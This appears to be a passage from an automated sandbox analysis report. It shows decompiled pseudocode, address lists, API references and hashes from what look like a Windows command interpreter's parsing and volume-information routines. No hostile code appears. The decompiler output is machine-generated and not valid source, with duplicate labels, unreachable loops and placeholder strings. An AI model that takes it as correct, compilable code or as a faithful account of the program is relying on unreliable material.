                                                      						goto L80;
                                                      					}
                                                      					L21:
                                                      					_t270 =  *_t320( *((intOrPtr*)(_t349 - 0x840)), _t169);
                                                      					__eflags = _t270;
                                                      					if(_t270 == 0) {
                                                      						goto L63;
                                                      					}
                                                      					goto L22;
                                                      				}
                                                      			}




































                                                      0x4a746bce
                                                      0x00000000
                                                      0x4a746bce
                                                      0x4a73765a
                                                      0x4a73765a
                                                      0x4a73765a
                                                      0x4a73765d
                                                      0x4a737981
                                                      0x4a737981
                                                      0x00000000
                                                      0x4a737981
                                                      0x4a737663
                                                      0x4a737663
                                                      0x4a737664
                                                      0x4a737664
                                                      0x4a737665
                                                      0x4a73fd47
                                                      0x4a73fd47
                                                      0x00000000
                                                      0x4a73fd47
                                                      0x4a73766b
                                                      0x4a73766b
                                                      0x4a73766b
                                                      0x4a73766e
                                                      0x4a742374
                                                      0x4a742374
                                                      0x4a74237b
                                                      0x4a742382
                                                      0x4a742382
                                                      0x4a7351bc
                                                      0x4a7351bf
                                                      0x4a7351c0
                                                      0x4a7351c3
                                                      0x4a7351ca
                                                      0x4a7351ca
                                                      0x4a74237d
                                                      0x4a746c64
                                                      0x4a746c69
                                                      0x4a746c6c
                                                      0x4a746bc8
                                                      0x00000000
                                                      0x4a737674
                                                      0x4a737674
                                                      0x4a737674
                                                      0x4a737674
                                                      0x00000000
                                                      0x4a737674
                                                      0x4a73766e
                                                      0x4a73768c
                                                      0x4a73768c
                                                      0x4a73768f
                                                      0x4a737696
                                                      0x4a737699
                                                      0x4a73fd19
                                                      0x4a73fd1f
                                                      0x4a73fd25
                                                      0x4a7376bc
                                                      0x4a7376c6
                                                      0x4a7376c9
                                                      0x4a7376ca
                                                      0x4a7376cc
                                                      0x00000000
                                                      0x00000000
                                                      0x4a7376d2
                                                      0x4a7376e0
                                                      0x4a7376e8
                                                      0x4a7376ea
                                                      0x4a737700
                                                      0x4a737711
                                                      0x4a737713
                                                      0x4a737715
                                                      0x4a735273
                                                      0x4a735279
                                                      0x4a73527c
                                                      0x4a735281
                                                      0x4a7351ba
                                                      0x4a7351ba
                                                      0x4a7351ba
                                                      0x00000000
                                                      0x4a735281
                                                      0x4a73771b
                                                      0x4a73771b
                                                      0x4a73771f
                                                      0x4a7351b2
                                                      0x4a7351b4
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x4a7351b4
                                                      0x4a737725
                                                      0x4a737725
                                                      0x4a73772b
                                                      0x4a73f3dc
                                                      0x4a73f3dc
                                                      0x4a7378d6
                                                      0x4a7378db
                                                      0x00000000
                                                      0x4a7378db
                                                      0x4a737731
                                                      0x4a737733
                                                      0x4a73773f
                                                      0x4a737745
                                                      0x4a746cc3
                                                      0x4a746cc3
                                                      0x4a746cca
                                                      0x4a746d10
                                                      0x4a746d10
                                                      0x00000000
                                                      0x4a746d10
                                                      0x4a746ccc
                                                      0x4a746ce4
                                                      0x4a746cea
                                                      0x4a746cf0
                                                      0x4a746cf2
                                                      0x00000000
                                                      0x00000000
                                                      0x4a746cf4
                                                      0x4a746cf4
                                                      0x4a746cfb
                                                      0x4a746d01
                                                      0x4a746d01
                                                      0x00000000
                                                      0x4a73774b
                                                      0x4a737761
                                                      0x4a737767
                                                      0x4a737771
                                                      0x4a73777f
                                                      0x4a737793
                                                      0x4a737797
                                                      0x4a73779d
                                                      0x4a73779f
                                                      0x4a746d23
                                                      0x4a7377a5
                                                      0x4a7377a5
                                                      0x4a7377a5
                                                      0x4a7377a5
                                                      0x4a7377a5
                                                      0x4a7377ac
                                                      0x4a7377b3
                                                      0x00000000
                                                      0x4a7377b9
                                                      0x4a7377b9
                                                      0x4a7377c1
                                                      0x4a7377cf
                                                      0x4a7377dd
                                                      0x4a7377dd
                                                      0x4a7377e2
                                                      0x4a7377e8
                                                      0x4a7377ee
                                                      0x4a7377f3
                                                      0x4a746d2e
                                                      0x4a746d3e
                                                      0x4a746d44
                                                      0x4a746d46
                                                      0x00000000
                                                      0x00000000
                                                      0x4a746d4c
                                                      0x4a746d4c
                                                      0x4a746d56
                                                      0x4a746d93
                                                      0x4a746d93
                                                      0x4a746d9d
                                                      0x4a746db1
                                                      0x4a746dbc
                                                      0x4a746dbe
                                                      0x4a746dcc
                                                      0x4a746dce
                                                      0x4a746dd2
                                                      0x4a746dd3
                                                      0x4a746dd7
                                                      0x4a746dd7
                                                      0x4a746dd7
                                                      0x4a746dce
                                                      0x4a746dfd
                                                      0x4a746e06
                                                      0x4a746e08
                                                      0x4a746e16
                                                      0x4a746e1b
                                                      0x4a746e1f
                                                      0x4a746e20
                                                      0x4a746e24
                                                      0x4a746e24
                                                      0x4a746e24
                                                      0x4a746e1b
                                                      0x4a746e31
                                                      0x4a746e43
                                                      0x4a746e46
                                                      0x4a746e46
                                                      0x4a746e4b
                                                      0x4a746e55
                                                      0x4a746e61
                                                      0x4a746e63
                                                      0x4a746e71
                                                      0x4a746e73
                                                      0x4a746e77
                                                      0x4a746e78
                                                      0x4a746e7c
                                                      0x4a746e7c
                                                      0x4a746e7c
                                                      0x4a746e73
                                                      0x4a746e83
                                                      0x4a746e8f
                                                      0x4a746eb7
                                                      0x4a746eb7
                                                      0x00000000
                                                      0x4a746e55
                                                      0x4a746d58
                                                      0x4a746d58
                                                      0x4a746d5a
                                                      0x4a746d61
                                                      0x00000000
                                                      0x00000000
                                                      0x4a746d63
                                                      0x4a746d63
                                                      0x4a746d68
                                                      0x4a746d68
                                                      0x4a746d6a
                                                      0x4a746d6c
                                                      0x4a746d6e
                                                      0x00000000
                                                      0x00000000
                                                      0x4a746d70
                                                      0x4a746d70
                                                      0x4a746d76
                                                      0x4a746d79
                                                      0x4a746d82
                                                      0x4a746d7b
                                                      0x4a746d7b
                                                      0x4a746d7b
                                                      0x4a746d83
                                                      0x4a746d87
                                                      0x4a746d89
                                                      0x4a746d8c
                                                      0x4a746d8d
                                                      0x4a746d91
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x4a746d91
                                                      0x00000000
                                                      0x4a746d68
                                                      0x4a7377f9
                                                      0x4a7377f9
                                                      0x4a7377ff
                                                      0x4a737804
                                                      0x4a746ebf
                                                      0x4a746ebf
                                                      0x4a746ec6
                                                      0x00000000
                                                      0x00000000
                                                      0x4a746ecc
                                                      0x4a7378cf
                                                      0x4a7378d5
                                                      0x00000000
                                                      0x4a7378d5
                                                      0x4a73780a
                                                      0x4a737810
                                                      0x4a737812
                                                      0x4a746ed3
                                                      0x4a746edd
                                                      0x4a746edf
                                                      0x4a746ee7
                                                      0x4a746ee8
                                                      0x4a746eec
                                                      0x4a746eec
                                                      0x4a746edf
                                                      0x4a737818
                                                      0x4a73781a
                                                      0x4a7378b3
                                                      0x4a7378c6
                                                      0x4a7378ca
                                                      0x00000000
                                                      0x4a737820
                                                      0x4a737820
                                                      0x4a737820
                                                      0x4a737827
                                                      0x4a742389
                                                      0x4a742389
                                                      0x4a74238b
                                                      0x00000000
                                                      0x00000000
                                                      0x4a742391
                                                      0x00000000
                                                      0x4a742391
                                                      0x4a73782d
                                                      0x4a73782d
                                                      0x4a737833
                                                      0x4a737835
                                                      0x4a737842
                                                      0x4a737847
                                                      0x4a737847
                                                      0x4a737847
                                                      0x4a73784e
                                                      0x4a73784e
                                                      0x4a737854
                                                      0x4a737854
                                                      0x4a73785b
                                                      0x4a737871
                                                      0x4a737875
                                                      0x4a73787a
                                                      0x4a73787a
                                                      0x4a737880
                                                      0x4a737888
                                                      0x4a737890
                                                      0x4a737892
                                                      0x4a73fea7
                                                      0x4a73fead
                                                      0x4a73fead
                                                      0x4a737898
                                                      0x4a73789f
                                                      0x4a7378a1
                                                      0x4a7378a3
                                                      0x4a7378a3
                                                      0x4a7378a6
                                                      0x4a7378ad
                                                      0x4a737977
                                                      0x4a737977
                                                      0x00000000
                                                      0x4a7378ad
                                                      0x4a73781a
                                                      0x4a7377b3
                                                      0x4a737745
                                                      0x4a7376ec
                                                      0x4a7376ec
                                                      0x4a7376f0
                                                      0x4a736c46
                                                      0x4a736c4f
                                                      0x4a736c51
                                                      0x4a736c53
                                                      0x4a746c49
                                                      0x4a746c49
                                                      0x4a746c50
                                                      0x00000000
                                                      0x00000000
                                                      0x4a746c52
                                                      0x00000000
                                                      0x4a736c59
                                                      0x4a736c5a
                                                      0x4a736c5f
                                                      0x4a736c63
                                                      0x4a736c6b
                                                      0x4a736c6b
                                                      0x00000000
                                                      0x4a736c63
                                                      0x4a736c53
                                                      0x4a7376f6
                                                      0x4a7376f6
                                                      0x4a7376fa
                                                      0x4a737922
                                                      0x4a737927
                                                      0x4a737929
                                                      0x4a73792f
                                                      0x4a737935
                                                      0x4a73793b
                                                      0x4a737942
                                                      0x4a737948
                                                      0x4a73794e
                                                      0x4a737954
                                                      0x4a737954
                                                      0x4a73794e
                                                      0x4a737942
                                                      0x4a737935
                                                      0x4a737929
                                                      0x00000000
                                                      0x4a7376fa
                                                      0x4a73769f
                                                      0x4a73769f
                                                      0x4a7376a3
                                                      0x4a746c12
                                                      0x4a746c13
                                                      0x4a746c17
                                                      0x4a746c23
                                                      0x4a746c26
                                                      0x4a746c27
                                                      0x4a746c29
                                                      0x00000000
                                                      0x00000000
                                                      0x4a746c2f
                                                      0x4a746c39
                                                      0x4a746c43
                                                      0x4a746c45
                                                      0x4a746c47
                                                      0x4a746c79
                                                      0x4a746c85
                                                      0x4a746c91
                                                      0x4a746c97
                                                      0x4a746c9c
                                                      0x4a746ca3
                                                      0x4a746ca5
                                                      0x4a746ca5
                                                      0x4a746ca5
                                                      0x4a746ca5
                                                      0x4a746cac
                                                      0x4a746cb3
                                                      0x4a746cb4
                                                      0x00000000
                                                      0x4a746cb4
                                                      0x00000000
                                                      0x4a746c47
                                                      0x4a7376a9
                                                      0x4a7376b0
                                                      0x4a7376b4
                                                      0x4a7376b6
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x4a7376b6

                                                      APIs
                                                      • GetFullPathNameW.KERNEL32(00000000,00000208,?,?,00000000), ref: 4A73775B
                                                      • wcsrchr.MSVCRT ref: 4A737793
                                                      • memset.MSVCRT ref: 4A7377CF
                                                      • wcsrchr.MSVCRT ref: 4A737888
                                                      • longjmp.MSVCRT(00004002,000000FF,00000025,00000000,4A754AC0), ref: 4A746BC8
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: wcsrchr$FullNamePathlongjmpmemset
                                                      • String ID: fdpnxsatz
                                                      • API String ID: 878463284-1106894203
                                                      • Opcode ID: d158c1d2a4fbba069be67ea3c1b07be02f10a2fdeb04320efb187a307d4bacb0
                                                      • Instruction ID: b565c5b56ddc727cfeacd64d03ab98029acd54c2170f186330ff7fdeac18a719
                                                      • Opcode Fuzzy Hash: d158c1d2a4fbba069be67ea3c1b07be02f10a2fdeb04320efb187a307d4bacb0
                                                      • Instruction Fuzzy Hash: 67C1B2B1909629DADFB08B24CC847A97FF8FB44361F1281D9D589A6181DF319AC8CFD4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 97%
                                                      			E4A731D26(signed int __eax, long* _a4, intOrPtr _a8, signed int _a12) {
                                                      				long _v8;
                                                      				signed short* _v12;
                                                      				void* __ecx;
                                                      				signed int _t42;
                                                      				signed int _t43;
                                                      				intOrPtr _t45;
                                                      				intOrPtr _t46;
                                                      				intOrPtr _t55;
                                                      				long _t67;
                                                      				signed short _t71;
                                                      				void* _t75;
                                                      				void* _t81;
                                                      				signed int _t89;
                                                      				signed int _t97;
                                                      				long _t98;
                                                      				long _t99;
                                                      				long _t100;
                                                      				long* _t103;
                                                      				long* _t105;
                                                      				long* _t107;
                                                      
                                                      				_t42 = __eax;
                                                      				_push(_t82);
                                                      				_push(0);
                                                      				_push(0x4a754ac0);
                                                      				L4A731BC7();
                                                      				if(__eax != 0) {
                                                      					L43:
                                                      					_t43 = _t42 | 0xffffffff;
                                                      					L17:
                                                      					return _t43;
                                                      				}
                                                      				_t103 = _a4;
                                                      				if(_t103 == 0) {
                                                      					if( *0x4a770658 != 0) {
                                                      						E4A7358F3(L"Ungetting: \'%s\'\n",  *0x4a754190);
                                                      					}
                                                      					_t45 =  *0x4a754190; // 0x0
                                                      					 *0x4a754194 = _t45;
                                                      					_t43 = 0;
                                                      					goto L17;
                                                      				}
                                                      				if(_a8 < 6) {
                                                      					goto L43;
                                                      				}
                                                      				_t46 =  *0x4a754194; // 0x0
                                                      				 *0x4a754190 = _t46;
                                                      				_v12 = _t103;
                                                      				if((_a12 & 0x00000021) != 0) {
                                                      					L10:
                                                      					if(E4A731F90( &_v8,  &_a12) != 0x100) {
                                                      						_a12 = _a12 | 0x00000040;
                                                      						 *_t103 = _v8;
                                                      						 *0x4a754198 =  *0x4a754198 & 0x00000000;
                                                      						_t105 =  &(_t103[0]);
                                                      						_t97 = _t105 - _v12 >> 1;
                                                      						while(1) {
                                                      							_a4 = _t105;
                                                      							if(E4A731F90( &_v8,  &_a12) == 0x100 || _t97 >= _a8 - 1) {
                                                      								break;
                                                      							}
                                                      							 *_t105 = _v8;
                                                      							_t105 =  &(_t105[0]);
                                                      							_t97 = _t97 + 1;
                                                      						}
                                                      						_a12 = _a12 & 0xffffffbf;
                                                      						 *_t105 = 0;
                                                      						_t55 = _a8;
                                                      						_t28 = _t55 - 1; // 0x5
                                                      						_t87 = _t28;
                                                      						if(_t97 < _t28) {
                                                      							_t55 = E4A731F77(_t55);
                                                      						}
                                                      						if(_t97 >= _t55) {
                                                      							if(_v8 == 0xffff) {
                                                      								goto L25;
                                                      							}
                                                      							_t42 = E4A736D44(_t87, 0x234f, 1, _v12);
                                                      							goto L43;
                                                      						} else {
                                                      							L25:
                                                      							_t43 = 0x4000;
                                                      							goto L17;
                                                      						}
                                                      					}
                                                      					_t98 = _v8;
                                                      					_t81 = 2;
                                                      					 *_t103 = _t98;
                                                      					_t107 =  &(_t103[0x40]);
                                                      					_a4 = _t107;
                                                      					if(iswdigit(_t98) != 0) {
                                                      						_t98 = E4A731E26() & 0x0000ffff;
                                                      						 *_t107 = _t98;
                                                      						_t107 =  &(_t107[0x40]);
                                                      						_v8 = _t98;
                                                      						_a4 = _t107;
                                                      					}
                                                      					if(_t98 == 0x7c || _t98 == 0x26 || _t98 == 0x3e || _t98 == 0x3c) {
                                                      						_t63 = E4A731E26() & 0x0000ffff;
                                                      						_v8 = _t63;
                                                      						_t30 = _t107 - 2; // 0x0
                                                      						if(_t63 ==  *_t30) {
                                                      							 *_t107 = _t63;
                                                      							_t107 = _t107 + _t81;
                                                      							_a4 = _t107;
                                                      							_t63 = E4A731E26() & 0x0000ffff;
                                                      							_v8 = _t63;
                                                      						}
                                                      						_t33 = _t107 - 2; // 0x0
                                                      						_t89 =  *_t33 & 0x0000ffff;
                                                      						if(_t89 != 0x3e) {
                                                      							if(_t89 != 0x3c) {
                                                      								goto L32;
                                                      							}
                                                      							goto L31;
                                                      						} else {
                                                      							L31:
                                                      							if(_t63 == 0x26) {
                                                      								_t67 = 0x26;
                                                      								 *_t107 = _t67;
                                                      								_t107 = _t107 + _t81;
                                                      								_a4 = _t107;
                                                      								do {
                                                      									_t99 = E4A731E26() & 0x0000ffff;
                                                      									_v8 = _t99;
                                                      								} while (iswspace(_t99) != 0 || E4A7318EB(?str?, _t99) != 0);
                                                      								if(iswdigit(_t99) != 0) {
                                                      									 *_t107 = _t99;
                                                      									_t107 = _t107 + _t81;
                                                      									_a4 = _t107;
                                                      									_t71 = E4A731E26();
                                                      									_t63 = _t71 & 0x0000ffff;
                                                      									_v8 = _t71 & 0x0000ffff;
                                                      								}
                                                      							}
                                                      							L32:
                                                      							E4A731F77(_t63);
                                                      							goto L16;
                                                      						}
                                                      					} else {
                                                      						L16:
                                                      						 *_t107 = 0;
                                                      						_t43 =  *_v12 & 0x0000ffff;
                                                      						goto L17;
                                                      					}
                                                      				} else {
                                                      					goto L4;
                                                      				}
                                                      				while(1) {
                                                      					L4:
                                                      					_t100 = E4A731E26() & 0x0000ffff;
                                                      					_v8 = _t100;
                                                      					if(iswspace(_t100) != 0 && _t100 != 0xa) {
                                                      						goto L6;
                                                      					} else {
                                                      						continue;
                                                      					}
                                                      					do {
                                                      						L4:
                                                      						_t100 = E4A731E26() & 0x0000ffff;
                                                      						_v8 = _t100;
                                                      					} while (iswspace(_t100) != 0 && _t100 != 0xa);
                                                      					L6:
                                                      					_t75 = 0x4a754672;
                                                      					if((_a12 & 0x00000004) == 0) {
                                                      						_t75 = 0x4a754670;
                                                      					}
                                                      					if(E4A7318EB(_t75, _t100) != 0) {
                                                      						if(_t100 == 0) {
                                                      							goto L9;
                                                      						}
                                                      						continue;
                                                      					} else {
                                                      						L9:
                                                      						E4A731F77(_t76);
                                                      						goto L10;
                                                      					}
                                                      				}
                                                      			}
























                                                      APIs
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: _setjmp3iswdigitiswspace
                                                      • String ID: =,;$Ungetting: '%s'
                                                      • API String ID: 3355992209-942940122
                                                      • Opcode ID: 74b95aba628bd9e11ae935d70b97dde7eebe7c83377f4fb08ef129c10f8d4849
                                                      • Instruction ID: 8beaa3999675f323fd22f9386800c8c8c0b51474fab1be1eb1c869ec9208a52b
                                                      • Opcode Fuzzy Hash: 74b95aba628bd9e11ae935d70b97dde7eebe7c83377f4fb08ef129c10f8d4849
                                                      • Instruction Fuzzy Hash: EF61367195EA96EBDF708F64C8446EE7FB4EF053A1F13001AE944CB242E3708A89C351
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 63%
                                                      			E4A74E53B(void* __edx, signed short _a4) {
                                                      				signed int _v8;
                                                      				intOrPtr _v12;
                                                      				short _v16;
                                                      				char _v272;
                                                      				short _v786;
                                                      				long _v800;
                                                      				void* __ebx;
                                                      				void* __edi;
                                                      				void* __esi;
                                                      				signed int _t17;
                                                      				short _t19;
                                                      				intOrPtr _t20;
                                                      				signed short _t21;
                                                      				void* _t28;
                                                      				int _t30;
                                                      				long _t31;
                                                      				signed short _t32;
                                                      				long _t51;
                                                      				void* _t55;
                                                      				void* _t58;
                                                      				void* _t60;
                                                      				void* _t63;
                                                      				long _t64;
                                                      				signed int _t66;
                                                      
                                                      				_t63 = __edx;
                                                      				_t17 =  *0x4a7540ac; // 0xbb40e64e
                                                      				_v8 = _t17 ^ _t66;
                                                      				_t19 =  *0x4a74e6d0; // 0x3a0020
                                                      				_t65 = _a4;
                                                      				_t64 =  *_t65 & 0x0000ffff;
                                                      				_v16 = _t19;
                                                      				_t20 =  *0x4a74e6d4; // 0x5c
                                                      				_v12 = _t20;
                                                      				if(_t64 != 0) {
                                                      					_t21 = _t65;
                                                      					_t63 = _t21 + 2;
                                                      					do {
                                                      						_t55 =  *_t21;
                                                      						_t21 = _t21 + 2;
                                                      					} while (_t55 != 0);
                                                      					if(_t21 - _t63 >> 1 != 2 ||  *((short*)(_t65 + 2)) != 0x3a) {
                                                      						L17:
                                                      						E4A7358F3();
                                                      						E4A736D44(_t55, 0xf, 0, 0x4a7545a8);
                                                      						goto L18;
                                                      					} else {
                                                      						_t30 = iswalpha(_t64);
                                                      						_pop(_t55);
                                                      						if(_t30 == 0) {
                                                      							goto L17;
                                                      						} else {
                                                      							_t31 =  *_t65 & 0x0000ffff;
                                                      							goto L8;
                                                      						}
                                                      					}
                                                      				} else {
                                                      					_t31 =  *0x4a755260 & 0x0000ffff;
                                                      					L8:
                                                      					_t32 = towupper(_t31);
                                                      					_pop(_t58);
                                                      					_t65 = _t32 & 0x0000ffff;
                                                      					_v16 = _t32 & 0x0000ffff;
                                                      					if(GetVolumeInformationW( &_v16,  &_v786, 0x101,  &_v800, 0, 0, 0, 0) != 0) {
                                                      						if(_v786 == 0) {
                                                      							E4A7399E1(_t58, 0x235e, 1, E4A739A2C(0x4a74e6c8, _t65 & 0x0000ffff));
                                                      						} else {
                                                      							_push( &_v786);
                                                      							E4A7399E1(_t58, 0x235f, 2, E4A739A2C(0x4a74e6c8, _t65 & 0x0000ffff));
                                                      						}
                                                      						_push(_v800 & 0x0000ffff);
                                                      						E4A73179D( &_v272, 0x80, L"%04X-%04X", _v800 >> 0x10);
                                                      						E4A7399E1(_v800 & 0x0000ffff, 0x235b, 1,  &_v272);
                                                      						_t28 = 0;
                                                      					} else {
                                                      						E4A7358F3();
                                                      						_t65 = GetLastError;
                                                      						_t60 = 0x4a7545a8;
                                                      						_t51 = GetLastError();
                                                      						_push(0);
                                                      						if(_t51 != 0x15) {
                                                      							_push(GetLastError());
                                                      						} else {
                                                      							_push(_t51);
                                                      						}
                                                      						E4A736D44(_t60);
                                                      						L18:
                                                      						_t28 = 1;
                                                      					}
                                                      				}
                                                      				return E4A7313A9(_t28, 0, _v8 ^ _t66, _t63, _t64, _t65);
                                                      			}




























                                                      APIs
                                                      • iswalpha.MSVCRT ref: 4A74E5A1
                                                      • towupper.MSVCRT ref: 4A74E5B4
                                                      • GetVolumeInformationW.KERNEL32(?,?,00000101,?,00000000,00000000,00000000,00000000), ref: 4A74E5DD
                                                      • GetLastError.KERNEL32 ref: 4A74E5F8
                                                      • GetLastError.KERNEL32(00000000), ref: 4A74E603
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000007.00000002.686944879.000000004A730000.00000040.00020000.sdmp, Offset: 4A730000, based on PE: true
                                                      • Associated: 00000007.00000002.686972505.000000004A770000.00000040.00020000.sdmp
                                                      Similarity
                                                      • API ID: ErrorLast$InformationVolumeiswalphatowupper
                                                      • String ID: :\$%04X-%04X
                                                      • API String ID: 930873262-3541097225
                                                      • Opcode ID: 954d7425646fc790f7203355b735d3838be9e893b98c75718490b3e06be68e9e
                                                      • Instruction ID: 5479123fb58f9202618def76ece3212f6adddb1a1d2dc5e1a2351b099ba1688b
                                                      • Opcode Fuzzy Hash: 954d7425646fc790f7203355b735d3838be9e893b98c75718490b3e06be68e9e
                                                      • Instruction Fuzzy Hash: C54127B2908128BEFB709BA4CD55DFB7BBCDB49320F414462F545DA082EA709E48CB71
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 64%
                                                      			E4A736C46(signed int __ebx, signed int __edx, void* __edi, signed int __esi) {
                                                      				signed int _t169;
                                                      				signed int _t170;
                                                      				signed int _t173;
                                                      				WCHAR* _t174;
                                                      				long _t188;
                                                      				signed int _t195;
                                                      				signed int _t198;
                                                      				signed char _t199;
                                                      				signed int _t206;
                                                      				void* _t229;
                                                      				void* _t248;
                                                      				void* _t252;
                                                      				short* _t253;
                                                      				signed int _t256;
                                                      				signed int _t260;
                                                      				signed int _t268;
                                                      				signed int _t271;
                                                      				signed int _t273;
                                                      				signed int _t277;
                                                      				signed int _t278;
                                                      				signed int _t279;
                                                      				signed int _t280;
                                                      				signed int _t283;
                                                      				signed int _t284;
                                                      				signed int _t286;
                                                      				signed int _t288;
                                                      				void* _t289;
                                                      				void* _t294;
                                                      				signed int _t321;
                                                      				signed int _t332;
                                                      				signed int _t336;
                                                      				WCHAR* _t339;
                                                      				void* _t340;
                                                      				void* _t341;
                                                      				WCHAR* _t342;
                                                      				signed int _t348;
                                                      				void* _t350;
                                                      				signed int _t357;
                                                      				signed int _t360;
                                                      				wchar_t* _t365;
                                                      				signed int _t367;
                                                      				void* _t369;
                                                      
                                                      				L0:
                                                      				while(1) {
                                                      					L0:
                                                      					_t348 = __esi;
                                                      					_t334 = __edx;
                                                      					_t288 = __ebx;
                                                      					_t339 = E4A7319D6(__edi + 2);
                                                      					if(_t339 == 0) {
                                                      						goto L80;
                                                      					} else {
                                                      						__eax = E4A732ED1(__edi);
                                                      						__eflags =  *__eax - 0x22;
                                                      						if( *__eax == 0x22) {
                                                      							__ecx = 0;
                                                      							 *__eax = __cx;
                                                      						}
                                                      						break;
                                                      					}
                                                      					while(1) {
                                                      						L80:
                                                      						__eflags =  *(_t367 - 0x830);
                                                      						if( *(_t367 - 0x830) != 0) {
                                                      							goto L83;
                                                      						} else {
                                                      							break;
                                                      						}
                                                      						while(1) {
                                                      							L83:
                                                      							__imp__longjmp( *(_t367 - 0x830), 0xffffffff);
                                                      							while(1) {
                                                      								L73:
                                                      								 *(_t367 - 0x828) =  *(_t367 - 0x828) | 0x00004100;
                                                      								while(1) {
                                                      									L18:
                                                      									_t348 = _t348 + 2;
                                                      									_t169 =  *_t348 & 0x0000ffff;
                                                      									__eflags = _t169;
                                                      									if(_t169 == 0) {
                                                      										break;
                                                      									}
                                                      									L8:
                                                      									__eflags = _t169 - 0x24;
                                                      									if(_t169 == 0x24) {
                                                      										break;
                                                      									}
                                                      									L9:
                                                      									_t271 =  *_t339(L"fdpnxsatz",  *_t288(_t169) & 0x0000ffff);
                                                      									_t369 = _t369 + 0xc;
                                                      									__eflags = _t271;
                                                      									if(_t271 == 0) {
                                                      										break;
                                                      									}
                                                      									L10:
                                                      									_t273 =  *_t339( *((intOrPtr*)(_t367 - 0x840)),  *_t348 & 0x0000ffff);
                                                      									__eflags = _t273;
                                                      									if(_t273 != 0) {
                                                      										 *(_t367 - 0x848) = _t348;
                                                      										 *(_t367 - 0x834) =  *(_t367 - 0x828);
                                                      									}
                                                      									_t277 =  *_t288( *_t348 & 0x0000ffff) & 0x0000ffff;
                                                      									__eflags = _t277 - 0x70;
                                                      									_pop(_t294);
                                                      									if(__eflags > 0) {
                                                      										L59:
                                                      										_t278 = _t277 - 0x73;
                                                      										__eflags = _t278;
                                                      										if(_t278 == 0) {
                                                      											L77:
                                                      											 *(_t367 - 0x828) =  *(_t367 - 0x828) | 0x00008020;
                                                      											continue;
                                                      										}
                                                      										L60:
                                                      										_t279 = _t278 - 1;
                                                      										__eflags = _t279;
                                                      										if(_t279 == 0) {
                                                      											L76:
                                                      											 *(_t367 - 0x828) =  *(_t367 - 0x828) | 0x00004200;
                                                      											continue;
                                                      										}
                                                      										L61:
                                                      										_t280 = _t279 - 4;
                                                      										__eflags = _t280;
                                                      										if(_t280 != 0) {
                                                      											L74:
                                                      											__eflags = _t280 != 0;
                                                      											if(_t280 != 0) {
                                                      												goto L67;
                                                      											}
                                                      											L75:
                                                      											 *(_t367 - 0x828) =  *(_t367 - 0x828) | 0x00004400;
                                                      											continue;
                                                      										}
                                                      										L62:
                                                      										 *(_t367 - 0x828) =  *(_t367 - 0x828) | 0x00008010;
                                                      										continue;
                                                      									} else {
                                                      										L12:
                                                      										if(__eflags == 0) {
                                                      											L57:
                                                      											 *(_t367 - 0x828) =  *(_t367 - 0x828) | 0x00008004;
                                                      											continue;
                                                      										}
                                                      										L13:
                                                      										_t283 = _t277 - 0x61;
                                                      										__eflags = _t283;
                                                      										if(_t283 == 0) {
                                                      											L73:
                                                      											 *(_t367 - 0x828) =  *(_t367 - 0x828) | 0x00004100;
                                                      											continue;
                                                      										}
                                                      										L14:
                                                      										_t284 = _t283 - 3;
                                                      										__eflags = _t284;
                                                      										if(_t284 == 0) {
                                                      											L56:
                                                      											 *(_t367 - 0x828) =  *(_t367 - 0x828) | 0x00008002;
                                                      											continue;
                                                      										}
                                                      										L15:
                                                      										_t286 = _t284;
                                                      										__eflags = _t286;
                                                      										if(_t286 == 0) {
                                                      											L65:
                                                      											 *(_t367 - 0x828) =  *(_t367 - 0x828) | 0x00008001;
                                                      											continue;
                                                      										}
                                                      										L16:
                                                      										__eflags = _t286 != 8;
                                                      										if(_t286 != 8) {
                                                      											L67:
                                                      											__eflags =  *(_t367 - 0x830);
                                                      											if( *(_t367 - 0x830) == 0) {
                                                      												L69:
                                                      												_t174 = 0;
                                                      												L3:
                                                      												_pop(_t340);
                                                      												_pop(_t350);
                                                      												_pop(_t289);
                                                      												return E4A7313A9(_t174, _t289,  *(_t367 - 4) ^ _t367, _t334, _t340, _t350);
                                                      											}
                                                      											L68:
                                                      											E4A736D44(_t294, 0x400023a8, 1,  *((intOrPtr*)(_t367 - 0x844)));
                                                      											_t369 = _t369 + 0xc;
                                                      											L83:
                                                      											__imp__longjmp( *(_t367 - 0x830), 0xffffffff);
                                                      											goto L73;
                                                      										} else {
                                                      											_t4 = _t367 - 0x828;
                                                      											 *_t4 =  *(_t367 - 0x828) | 0x00008008;
                                                      											__eflags =  *_t4;
                                                      											continue;
                                                      										}
                                                      									}
                                                      								}
                                                      								L19:
                                                      								_t170 =  *_t348 & 0x0000ffff;
                                                      								 *(_t367 - 0x838) =  *(_t367 - 0x838) & 0x00000000;
                                                      								__eflags = _t170;
                                                      								if(_t170 == 0) {
                                                      									L63:
                                                      									_t348 =  *(_t367 - 0x848);
                                                      									 *(_t367 - 0x828) =  *(_t367 - 0x834);
                                                      									L22:
                                                      									_t173 =  *_t339( *((intOrPtr*)(_t367 - 0x840)),  *_t348 & 0x0000ffff);
                                                      									_pop(_t294);
                                                      									__eflags = _t173;
                                                      									if(_t173 == 0) {
                                                      										goto L67;
                                                      									}
                                                      									L23:
                                                      									_t339 =  *( *(_t367 - 0x83c) + (_t173 -  *((intOrPtr*)(_t367 - 0x840)) >> 1) * 4);
                                                      									__eflags = _t339;
                                                      									if(_t339 == 0) {
                                                      										goto L26;
                                                      									}
                                                      									L24:
                                                      									__eflags =  *_t339 - 0x22;
                                                      									if( *_t339 == 0x22) {
                                                      										goto L0;
                                                      									}
                                                      									L25:
                                                      									__eflags =  *_t348 - 0x30;
